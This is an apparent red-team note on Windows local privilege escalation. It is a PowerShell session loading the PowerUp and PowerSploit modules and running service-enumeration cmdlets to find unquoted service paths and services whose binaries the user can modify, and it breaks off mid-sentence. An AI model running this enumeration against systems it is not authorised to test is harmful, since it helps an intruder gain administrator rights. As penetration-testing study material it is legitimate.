Powershell * RED TEAM SECURITY

Local Privilege Escalation

PowerUP: PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master> cd .\PowerUp\ PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerUp> dir PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerUp> . .\PowerUp.ps1 Get services with unquoted paths and a space in their executable path: PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerUp> Get-ServiceUnquoted –vebose Get services where the current user can write to its binary path: PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master> Import-Module .\PowerSploit.psm1 PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master> Get-ModifiableService –verbose Get the services which current user can…